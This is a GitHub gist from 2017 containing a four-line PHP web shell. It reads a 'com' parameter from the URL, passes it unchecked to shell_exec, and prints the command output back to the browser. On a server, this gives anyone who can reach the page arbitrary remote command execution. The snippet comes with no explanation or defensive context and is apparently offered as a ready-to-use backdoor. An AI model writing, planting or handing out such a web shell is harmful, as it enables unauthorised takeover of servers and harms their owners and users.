Skip to content

Instantly share code, notes, and snippets.

@seliver
Created March 31, 2017 18:29
Show Gist options
  • Save seliver/97054473686475b2f3b0db1028762033 to your computer and use it in GitHub Desktop.
Save seliver/97054473686475b2f3b0db1028762033 to your computer and use it in GitHub Desktop.
echo "command: ".stripslashes(urldecode($_GET['com'])) ."<br/>";
echo nl2br( shell_exec ( stripslashes( urldecode($_GET['com']) ) ." 2>&1" ) );
echo "<br/>";
die;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment